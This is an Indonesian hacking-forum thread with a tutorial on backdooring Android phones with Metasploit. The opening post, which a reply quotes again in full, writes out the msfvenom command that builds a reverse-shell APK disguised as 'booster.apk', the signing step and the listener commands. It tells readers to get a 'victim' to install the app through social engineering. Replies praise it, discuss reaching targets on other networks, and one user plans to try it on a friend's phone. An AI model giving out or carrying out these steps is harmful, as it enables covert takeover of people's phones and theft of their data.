BackBox Indonesia
Metasploit Android on Backbox Linux - Printable Version

+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Exploitation (https://www.backboxindonesia.or.id/forum-13.html)
+--- Thread: Metasploit Android on Backbox Linux (/thread-23.html)

Pages: 1 2

Metasploit Android on Backbox Linux - SengklekCode - 03-10-2016

Selamat Malam Semua, Perkenalkan ane member baru disini dan ini thread pertama ane :D 

kali ini saya mau share tutor metasploit android dengan backbox yang satu jaringan :v klo beda jaringan belum nyoba sih :v

ok pertama buka terminal dan ketik : " msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=8888 R> /home/nama user/Desktop/booster.apk " kemudian ENTER
*untuk LHOST ganti dengan ip ente ye..

jika berhasil maka outputnya kek gini


[Image: 12821499_1705345009748867_80868740226549...e=57990C7C]

setelah itu cek file booster.apk di Desktop ente, jika ada maka itu tandanya berhasil,

nah biar gak ada eror pas instal backdoor ( booster.apk ) di android korban maka kita harus sign file .apk terlebih dahulu,,

download bahannya Disini
extract file yang sudah di download tadi, kemudian pindahkan file booster.apk ke dalam folder hasil extract tadi,
buka terminal dan masuk ke folder hasil extract tadi, ane disini simpan foldernya di Documents,

cd Documents/sign
java -jar signapk.jar certificate.pem key.pk8 booster.apk sign-booster.apk


[Image: 12832461_1705345159748852_71001974557796...e=5757B322]

*sign-booster.apk adalah file yang sudah di sign dan akan kita kirim ke korban,

kemudian buka terminal dan jalankan metasploitnya

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost "ip ente"
set lport 8888
exploit


[Image: 12791118_1705345149748853_65053201605018...e=574DAAAD]

nah kemudian kita suruh korban untuk install dan buka aplikasinya, gunakan teknik soceng terbaik ente di tahap ini wkkwkwk

jika muncul output seperti di bawah maka kita berhasil masuk ke ponsel korban,



 [Image: 12814224_1705344959748872_61768023103864...e=579744DD]

nah kita udah masuk ke ponsel korban tinggal terserah mau di apakan :v

untuk melihat command ketik " help "



sekian dari saya mohon maaf jika ada salah kata, maaf juga kalo threadnya acak-acakan wkkwk

wassalam

RE: Metasploit Android on Backbox Linux - CyberCl0wn - 03-10-2016

Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

RE: Metasploit Android on Backbox Linux - SengklekCode - 03-10-2016

(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

masih nyari referensi mas blm nemu yang beda jaringan wkkwk

RE: Metasploit Android on Backbox Linux - kalong404 - 03-11-2016

Mantap kang tutor nya..
Ane mo nanya nih..klo korban uninstal backdoor nya apa kah msh berfungsi exploit nya??

RE: Metasploit Android on Backbox Linux - anongep - 03-11-2016

(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

setahu saya, untuk exploit beda jaringan,  backdoor set LHOST dengan IP public agan ^_^/

RE: Metasploit Android on Backbox Linux - Oncom - 03-11-2016

akhirnya nemu juga yg buat apk tidak rusak saat pas diinstall di smartphone terima kasih om sudah share great exploit.

RE: Metasploit Android on Backbox Linux - Code Sec7or - 03-12-2016

(03-10-2016, 12:23 PM)SengklekCode Wrote: Selamat Malam Semua, Perkenalkan ane member baru disini dan ini thread pertama ane :D 

kali ini saya mau share tutor metasploit android dengan backbox yang satu jaringan :v klo beda jaringan belum nyoba sih :v

ok pertama buka terminal dan ketik : " msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=8888 R> /home/nama user/Desktop/booster.apk " kemudian ENTER
*untuk LHOST ganti dengan ip ente ye..

jika berhasil maka outputnya kek gini


[Image: 12821499_1705345009748867_80868740226549...e=57990C7C]

setelah itu cek file booster.apk di Desktop ente, jika ada maka itu tandanya berhasil,

nah biar gak ada eror pas instal backdoor ( booster.apk ) di android korban maka kita harus sign file .apk terlebih dahulu,,

download bahannya Disini
extract file yang sudah di download tadi, kemudian pindahkan file booster.apk ke dalam folder hasil extract tadi,
buka terminal dan masuk ke folder hasil extract tadi, ane disini simpan foldernya di Documents,

cd Documents/sign
java -jar signapk.jar certificate.pem key.pk8 booster.apk sign-booster.apk


[Image: 12832461_1705345159748852_71001974557796...e=5757B322]

*sign-booster.apk adalah file yang sudah di sign dan akan kita kirim ke korban,

kemudian buka terminal dan jalankan metasploitnya

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost "ip ente"
set lport 8888
exploit


[Image: 12791118_1705345149748853_65053201605018...e=574DAAAD]

nah kemudian kita suruh korban untuk install dan buka aplikasinya, gunakan teknik soceng terbaik ente di tahap ini wkkwkwk

jika muncul output seperti di bawah maka kita berhasil masuk ke ponsel korban,



 [Image: 12814224_1705344959748872_61768023103864...e=579744DD]

nah kita udah masuk ke ponsel korban tinggal terserah mau di apakan :v

untuk melihat command ketik " help "



sekian dari saya mohon maaf jika ada salah kata, maaf juga kalo threadnya acak-acakan wkkwk

wassalam
Dulu pernah share sama kawan2 MCC (Malang Cyber Crew) waktu Gathering bareng sama Backbox Ngalam.
Pernah coba exploit ke Android & berhasil (masalah tutor di Google banyak)..heheheheh
Tapi kagak perlu sign file .apk.
Kalo boleh tau itu fungsinya untuk apa,mas?
Nahh kalo gak sign file .apk apa exploit nya akan gagal? :)

RE: Metasploit Android on Backbox Linux - Logika Galau - 03-12-2016

Mantepp....

RE: Metasploit Android on Backbox Linux - oepilcore - 03-12-2016

manntabb mass , bisa saya coba untuk pelajarin nanti make andro temen saya >< :3

RE: Metasploit Android on Backbox Linux - owl - 03-13-2016

(03-11-2016, 10:23 AM)anongep Wrote:
(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

setahu saya, untuk exploit beda jaringan,  backdoor set LHOST dengan IP public agan ^_^/

bukan cuma pake IP Public... tp harus ada settingan di modem juga...... ^_^ CMIIW